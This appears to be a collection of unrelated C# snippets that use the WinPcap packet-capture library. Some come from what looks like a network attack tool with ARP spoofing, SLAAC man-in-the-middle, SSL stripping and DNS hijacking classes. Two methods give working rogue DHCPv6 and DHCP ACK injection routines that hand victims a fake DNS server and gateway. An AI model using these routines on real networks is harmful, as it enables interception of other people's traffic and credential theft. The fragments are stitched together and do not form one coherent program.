// start listening on a device (combobox index) public void StartDevice(int deviceIndex) { Started = true; DeviceInfo = DeviceInfoList[deviceIndex]; Device = WinPcapDeviceList.Instance[deviceIndex]; Sniffer = new Sniffer(DeviceInfo); ARPTools = new ARPTools(DeviceInfo); NDTools = new NDTools(DeviceInfo); SSLStrip = new SSLStrip(); Scanner = new Scanner(DeviceInfo); Sniffer.SnifferResult += new SnifferResultHandler(sniffer_OnSnifferResult); Scanner.ScannerResponse += new ScannerResponseReceived(scanner_OnResponse); Scanner.ScanComplete += new ScannerEventHandler(scanner_OnScanComplete); Scanner.HostnameResolved += new ScannerHostnameResolvedHandler(scanner_HostnameResolved); SSLStrip.SSLStripped += new SSLStripHandler(SSLStrip_OnSSLStripped); // open device, set filters & events, start capturing Device.Open(DeviceMode.Promiscuous, 1); Device.Filter = "(arp || ip || ip6)"; Device.OnPacketArrival += new PacketArrivalEventHandler(device_OnPacketArrival); Device.StartCapture(); }
public SlaacMITM(WinPcapDevice device, IList<Data.Attack> attacks) { this.device = device; this.attacks = attacks; invalidMac = PhysicalAddress.Parse("00-00-00-00-00-00"); }
public void Run(WinPcapDevice device) { comm = device; device.Open(OpenFlags.Promiscuous, 1, null); comm.Filter = ("arp"); comm.NonBlockingMode = true; lDev.Text = device.Description; }
public Router(WinPcapDevice dev, SynchronizedCollection<Data.Attack> attacks, SynchronizedCollection<string> slaacReqs) { this.device = dev; this.localPhysicalAddress = device.MacAddress; this.attacks = attacks; //this.slaacReqs = slaacReqs; this.dnsHijacking = new DNSHijacking(dev, attacks); }
private void btnSelect_Click(object sender, EventArgs e) { if (cmdAdapters.SelectedItem != null) { Device = _devices[cmdAdapters.SelectedIndex]; DialogResult = DialogResult.OK; Close(); } }
/// <summary> /// Creates and allocates a new SendQueue /// </summary> /// <param name="memSize"> /// The maximun amount of memory (in bytes) /// to allocate for the queue</param> public SendQueue(int memSize) { // ensure that we are running under winpcap WinPcapDevice.ThrowIfNotWinPcap(); m_queue = WinPcap.SafeNativeMethods.pcap_sendqueue_alloc(memSize); if (m_queue == IntPtr.Zero) { throw new PcapException("Error creating PcapSendQueue"); } }
private ushort _srcPort; // we can use this for sending so it goes back to the GunZ2 socket. #endregion Fields #region Constructors public SharkStream(WinPcapDevice device) { _commands = new List<Command>(); _device = device; var reader = new StreamReader("proto.json"); var jss = new JavaScriptSerializer(); _commands = jss.Deserialize<List<Command>>(reader.ReadToEnd()); Console.WriteLine("Loaded: {0} commands.", _commands.Count); }
public PasiveScan(WinPcapDevice device, SynchronizedCollection<Data.Attack> attacks, IList<Data.Neighbor> neighbors, SynchronizedCollection<string> slaacReqs) { this.device = device; this.localPhysicalAddress = device.MacAddress; this.attacks = attacks; this.neighbors = neighbors; this.route = new Router(device, attacks, slaacReqs); this.pasivePortScan = new PasivePortScanner(neighbors); /* Ataques pasivos */ this.DHCPACKInjection = new DHCPACKInjection(device, attacks); this.DHCPIpv6 = new DHCPIpv6(device, attacks); }
/// <summary> /// Send a queue of raw packets to the network. /// </summary> /// <param name="device"> /// The device on which to send the queue /// A <see cref="PcapDevice"/> /// </param> /// <param name="transmitMode"> /// A <see cref="SendQueueTransmitModes"/> /// </param> /// <returns> /// A <see cref="System.Int32"/> /// </returns> public int Transmit(WinPcapDevice device, SendQueueTransmitModes transmitMode) { if (!device.Opened) { throw new DeviceNotReadyException("Can't transmit queue, the pcap device is closed"); } if (m_queue == IntPtr.Zero) { throw new PcapException("Can't transmit queue, this queue is disposed"); } int sync = (transmitMode == SendQueueTransmitModes.Synchronized) ? 1 : 0; return(WinPcap.SafeNativeMethods.pcap_sendqueue_transmit(device.PcapHandle, m_queue, sync)); }
private void cbDevices_SelectedIndexChanged(object sender, EventArgs e) { if (_selectedDevice != null) { _selectedDevice.OnPacketArrival -= SelectedDevice_OnPacketArrival; _selectedDevice.StopCapture(); _selectedDevice.Close(); } _selectedDevice = ((DeviceWrapper)cbDevices.SelectedItem).Device; _selectedDevice.OnPacketArrival += SelectedDevice_OnPacketArrival; _selectedDevice.Open(DeviceMode.Normal); _selectedDevice.Filter = "net not 10.0.0.0/8 and net not 172.16.0.0/12 and net not 192.168.0.0/24"; _selectedDevice.StartCapture(); _packetCount = 0; lblTrackingCount.Text = "0"; }
private static bool IsInteresting(WinPcapDevice device) { return true; }
public NASpoofing(WinPcapDevice device, SynchronizedCollection<Data.Attack> attacks) { this.device = device; this.attacks = attacks; }
private void comboBox1_SelectedIndexChanged(object sender, EventArgs e) { this.selectedDevice = this.devices[this.comboBox1.SelectedIndex]; this.propertyGrid1.SelectedObject = this.selectedDevice; }
public void SetDevice(WinPcapDevice device) { this.device = device; }
public IPAddress GetIPv4FromDevice(WinPcapDevice device) { foreach (PcapAddress address in ((WinPcapDevice)device).Addresses.Where(A => A.Addr.ipAddress != null && A.Addr.ipAddress.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)) { return address.Addr.ipAddress; } return null; }
private void btAccept_Click(object sender, EventArgs e) { this.DialogResult = System.Windows.Forms.DialogResult.OK; this.device = (WinPcapDevice)dgvInterfaces.SelectedRows[0].Tag; this.Close(); SaveSettingsInterface(); }
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p) { if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket)) return; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if (udp.ParentPacket == null) return; if (!(udp.ParentPacket is IPv6Packet)) return; if (attacks.Where(A => A.attackType == AttackType.DHCPIpv6).Count() == 0) return; DhcpIPv6 attack = (DhcpIPv6)attacks.Where(A => A.attackType == AttackType.DHCPIpv6).First(); IPv6Packet packetIpLayer = (IPv6Packet)udp.ParentPacket; EthernetPacket ethernet = (EthernetPacket)p; /* Info: http://en.wikipedia.org/wiki/DHCPv6 Example In this example, the server's link-local address is fe80::0011:22ff:fe33:5566/64 and the client's link-local address is fe80::aabb:ccff:fedd:eeff/64. DHCPv6 client sends a Solicit from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. DHCPv6 server replies with an Advertise from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. DHCPv6 client replies with a Request from [fe80::aabb:ccff:fedd:eeff]:546 for [ff02::1:2]:547. (All client messages are sent to the multicast address, per section 13 of RFC 3315.) DHCPv6 server finishes with a Reply from [fe80::0011:22ff:fe33:5566]:547 for [fe80::aabb:ccff:fedd:eeff]:546. */ DHCPv6Packet pa = new DHCPv6Packet(); pa.ParsePacket(udp.PayloadData); if (packetIpLayer.DestinationAddress.Equals(IPAddress.Parse("ff02::1:2"))) { EthernetPacket newPEthernet = new EthernetPacket(device.Interface.MacAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV6); UdpPacket newUDP = null; IPAddress ipv6LocalLink = null; IPv6Packet newIpv6 = null; switch (pa.MessageType) { case DHCPv6Type.Solicit: if (pa.Options.ContainsKey(DHCPv6OptionCode.ClientIdentifier) && pa.Options.ContainsKey(DHCPv6OptionCode.IANA)) { newUDP = new UdpPacket(547, 546); byte[] iaid = pa.Options[DHCPv6OptionCode.IANA].Value; pa.MessageType = DHCPv6Type.Advertise; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddIANAOption(IPAddress.Parse(string.Format("{0}:{1}", attack.fakeIPRange.ToString().Substring(0, attack.fakeIPRange.ToString().LastIndexOf(':')), IpID)), iaid); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); IpID++; newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); } break; case DHCPv6Type.Request: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.DNS); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; case DHCPv6Type.InformationRequest: newUDP = new UdpPacket(547, 546); pa.MessageType = DHCPv6Type.Reply; pa.Options.Remove(DHCPv6OptionCode.ElapsedTime); pa.Options.Remove(DHCPv6OptionCode.FQDM); pa.Options.Remove(DHCPv6OptionCode.VendorClass); pa.Options.Remove(DHCPv6OptionCode.OptionRequest); pa.Options.Remove(DHCPv6OptionCode.IANA); pa.AddServerIdentifierOption(device.MacAddress); pa.AddDNSOption(attack.fakeDns); pa.AddDomainSearchListOption(new string[] { "google.com" }); newUDP.PayloadData = pa.BuildPacket(); ipv6LocalLink = IPAddress.Parse(Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(device).ToString()); newIpv6 = new IPv6Packet(ipv6LocalLink, packetIpLayer.SourceAddress); newIpv6.HopLimit = 1; newIpv6.PayloadPacket = newUDP; newPEthernet.PayloadPacket = newIpv6; newUDP.UpdateCalculatedValues(); newUDP.UpdateUDPChecksum(); Program.CurrentProject.data.SendPacket(newPEthernet); break; default: break; } } }
public ARPSpoofing(WinPcapDevice device, IPAddress ipV4Local, SynchronizedCollection<Data.Attack> attacks) { this.device = device; this.attacks = attacks; this.ipLocal = ipV4Local; }
public DeviceWrapper(WinPcapDevice device) { Device = device; }
unsafe public void AnalyzePacket(WinPcapDevice device, Packet p) { if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket)) return; UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket; if (udp.ParentPacket == null) return; if (!(udp.ParentPacket is IPv4Packet)) return; IPv4Packet packetIpLayer = (IPv4Packet)udp.ParentPacket; if (udp.PayloadData.Length < sizeof(DHCP.bootp)) return; DHCP.bootp* dhcp = (DHCP.bootp*)Marshal.UnsafeAddrOfPinnedArrayElement(udp.PayloadData, 0).ToPointer(); DHCP.RequestedIP optionRequestedIP = new DHCP.RequestedIP(); bool existsOptionRequestedIP = false; DHCP.ServerID optionServerID = new DHCP.ServerID(); bool existsOptionServerID = false; string Strname = string.Empty; ushort bp_vend_len = (ushort)(udp.Length - Marshal.SizeOf(*dhcp) + 4); uint pos = 4; while (pos < bp_vend_len) { byte option = dhcp->bp_vend[pos]; if (option == 0xff) { break; } byte len = dhcp->bp_vend[pos + 1]; switch (option) { case DHCP.TAG_DHCP_MESSAGE: { DHCP.MessageType* mtype = (DHCP.MessageType*)(dhcp->bp_vend + pos); //We save the real DHCP IP if (mtype->type == DHCP.DHCPACK && packetIpLayer.SourceAddress.Address != 0) DHCPIP = packetIpLayer.SourceAddress; //We get the DHCP Server MAC if (mtype->type == DHCP.DHCPOFFER) DHCPMAC = (p as EthernetPacket).SourceHwAddress; //We only continue if it's a DHCP Request if (mtype->type != DHCP.DHCPREQUEST) return; break; } case DHCP.TAG_REQUESTED_IP: { optionRequestedIP.id = ((DHCP.RequestedIP*)(dhcp->bp_vend + pos))->id; existsOptionRequestedIP = true; break; } case DHCP.TAG_SERVER_ID: { optionServerID.id = ((DHCP.ServerID*)(dhcp->bp_vend + pos))->id; DHCPIP = new IPAddress(optionServerID.id); existsOptionServerID = true; break; } case DHCP.TAG_HOSTNAME: { byte* chr = (((DHCP.Hostname*)(dhcp->bp_vend + pos))->name); byte lenght = ((DHCP.Hostname*)(dhcp->bp_vend + pos))->optionHeader.lenght; for (int i = 0; i < lenght; i++) Strname += (char)chr[i]; break; } } pos += (uint)len + 2; //The option and the length field } bool realizarataque = false; string dns = string.Empty; string gateway = string.Empty; string MAC; foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DHCPACKInjection && A.attackStatus == Data.AttackStatus.Attacking)) { dns = (attack as DHCPACKInjectionAttack).dns; gateway = (attack as DHCPACKInjectionAttack).gateway; MAC = (attack as DHCPACKInjectionAttack).MAC; //If filter does not apply not continue if (!string.IsNullOrEmpty(MAC) && !(p.PayloadPacket as EthernetPacket).SourceHwAddress.Equals(PhysicalAddress.Parse(MAC))) realizarataque = false; else { realizarataque = true; break; } } if (!realizarataque) return; //Configuration used in the attack PhysicalAddress MACUsed; if (Program.CurrentProject.data.settings.UseRealDHCPData) { if (DHCPMAC != null) MACUsed = DHCPMAC; else //If the real dhcp server mac is not found we use the computer network device mac MACUsed = device.Interface.MacAddress; } else { MACUsed = PhysicalAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerMAC); } IPAddress IPUsed; if (Program.CurrentProject.data.settings.UseRealDHCPData) { if (existsOptionServerID) IPUsed = new IPAddress(optionServerID.id); else { if (DHCPIP.Address == 0) { Program.LogThis("DHCP IP Address unknown, using 0.0.0.0 as IP source", Logs.Log.LogType.DHCPACKInjection); IPUsed = IPAddress.Parse("0.0.0.0"); } else { IPUsed = DHCPIP; } } } else { IPUsed = IPAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerIP); } //Now we create a fake response EthernetPacket response = new EthernetPacket(MACUsed, new PhysicalAddress(new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }), EthernetPacketType.IpV4); response.PayloadPacket = new IPv4Packet(IPUsed, new System.Net.IPAddress(0xffffffff)); //We want to follow the IP communication (response.PayloadPacket as IPv4Packet).Id = packetIpLayer.Id; response.PayloadPacket.PayloadPacket = new UdpPacket(67, 68); response.PayloadPacket.PayloadPacket.PayloadData = new byte[16]; response.PayloadPacket.PayloadPacket.PayloadData = new byte[sizeof(DHCP.bootp) + sizeof(DHCP.optionsResponse)]; dhcp->bp_op = DHCP.BOOTPREPLY; if (existsOptionRequestedIP) dhcp->bp_yiaddr = optionRequestedIP.id; else if (dhcp->bp_ciaddr != 0) dhcp->bp_yiaddr = dhcp->bp_ciaddr; else { return; } dhcp->bp_flags = 0; Marshal.Copy(new IntPtr(dhcp), response.PayloadPacket.PayloadPacket.PayloadData, 0, sizeof(DHCP.bootp)); //We need to fill the optionResponseStatic fields if (existsOptionServerID) optionResponseStatic.serverID.id = optionServerID.id; optionResponseStatic.serverID.id = (uint)IPUsed.Address; optionResponseStatic.route.ip = (uint)IPAddress.Parse(gateway).Address; optionResponseStatic.domainNameServer.ip = (uint)IPAddress.Parse(dns).Address; fixed (DHCP.optionsResponse* op = &optionResponseStatic) { Marshal.Copy(new IntPtr(op), response.PayloadPacket.PayloadPacket.PayloadData, sizeof(DHCP.bootp), sizeof(DHCP.optionsResponse)); } response.UpdateCalculatedValues(); (response.PayloadPacket as IPv4Packet).UpdateCalculatedValues(); (response.PayloadPacket as IPv4Packet).UpdateIPChecksum(); (response.PayloadPacket.PayloadPacket as UdpPacket).UpdateCalculatedValues(); (response.PayloadPacket.PayloadPacket as UdpPacket).UpdateUDPChecksum(); device.SendPacket(response); string message = string.Format("DHCP ACK sent to a {0} DHCP Request", new IPAddress(dhcp->bp_yiaddr).ToString()); Program.LogThis(message, Logs.Log.LogType.DHCPACKInjection); }
public DHCPACKInjection(WinPcapDevice device, SynchronizedCollection<Data.Attack> attacks) { this.device = device; this.attacks = attacks; }
public Scanner(DeviceInfo deviceInfo) { device = deviceInfo.Device; this.deviceInfo = deviceInfo; }
private string GetDeviceString(WinPcapDevice dev, int index) { return string.Format("({0}) {1} ## {2} ", index, dev.Interface.FriendlyName , dev.Interface.Description); }
public DHCPIpv6(WinPcapDevice device, IList<Data.Attack> attacks) { this.device = device; this.attacks = attacks; }
public DNSHijacking(WinPcapDevice dev, SynchronizedCollection<Data.Attack> attacks) { this.Device = dev; this.attacks = attacks; }
/// <summary> /// Send a queue of raw packets to the network. /// </summary> /// <param name="device"> /// The device on which to send the queue /// A <see cref="PcapDevice"/> /// </param> /// <param name="transmitMode"> /// A <see cref="SendQueueTransmitModes"/> /// </param> /// <returns> /// A <see cref="int"/> /// </returns> public int Transmit(WinPcapDevice device, SendQueueTransmitModes transmitMode) { return(Transmit(device, transmitMode == SendQueueTransmitModes.Synchronized)); }
private TcpSynPortScanner(string hostName) { timeout = 5000; localIp = NetworkUtils.GetLocalHostIP(); localPort = (ushort)new Random().Next(20000, 50000); device = NetworkUtils.GetActiveDevice(localIp); localMacAddress = device.Interface.MacAddress; destinationIp = NetworkUtils.ResolveHostName(hostName); var tryCount = 8; while (--tryCount > 0) { destinationMacAddress = NetworkUtils.GetMacAddress(destinationIp); if (!Equals(destinationMacAddress, new PhysicalAddress(new byte[] { 0, 0, 0, 0, 0, 0 }))) break; Thread.Sleep(500 / tryCount); } if (destinationMacAddress == null) throw new Exception("Destination MAC can't be null"); device.Open(DeviceMode.Promiscuous, 100); ConfigureWinPcapDevice(); }
public IPAddress GetIPv6LocalLinkFromDevice(WinPcapDevice device) { if (device == null) return null; foreach (PcapAddress address in ((WinPcapDevice)device).Addresses.Where(A => A.Addr.ipAddress != null && A.Addr.ipAddress.AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6)) { if (address.Addr.ipAddress.IsIPv6LinkLocal) return address.Addr.ipAddress; } return null; }
private void btExit_Click(object sender, EventArgs e) { this.DialogResult = System.Windows.Forms.DialogResult.Cancel; this.device = null; this.Close(); }
public Sockaddr GetNetmaskFromIP(WinPcapDevice device, IPAddress ipAddress) { foreach (PcapAddress address in device.Addresses.Where(A => A.Addr.ipAddress.Equals(ipAddress))) { return address.Netmask; } return null; }
private void scan_transfer_speed(String devicename, String ipadd) { CaptureDeviceList devices = CaptureDeviceList.New(); foreach (WinPcapDevice d in devices) { if (d.Interface.FriendlyName == devicename) { _device = d; break; } } if (_device != null) { _device.OnPcapStatistics += new StatisticsModeEventHandler(update_statistics); _device.Open(DeviceMode.Promiscuous, 1000); _device.Filter = "(tcp or udp) and host " + ipadd; _device.Mode = CaptureMode.Statistics; _device.StartCapture(); } }
public ARPTools(DeviceInfo deviceInfo) { device = deviceInfo.Device; this.deviceInfo = deviceInfo; }
/// <summary> /// Send a queue of raw packets to the network. /// </summary> /// <param name="device"> /// The device on which to send the queue /// A <see cref="PcapDevice"/> /// </param> /// <param name="transmitMode"> /// A <see cref="SendQueueTransmitModes"/> /// </param> /// <returns> /// A <see cref="System.Int32"/> /// </returns> public int Transmit( WinPcapDevice device, SendQueueTransmitModes transmitMode) { if(!device.Opened) throw new DeviceNotReadyException("Can't transmit queue, the pcap device is closed"); if(m_queue==IntPtr.Zero) { throw new PcapException("Can't transmit queue, this queue is disposed"); } int sync = (transmitMode == SendQueueTransmitModes.Synchronized) ? 1 : 0; return WinPcap.SafeNativeMethods.pcap_sendqueue_transmit(device.PcapHandle, m_queue, sync); }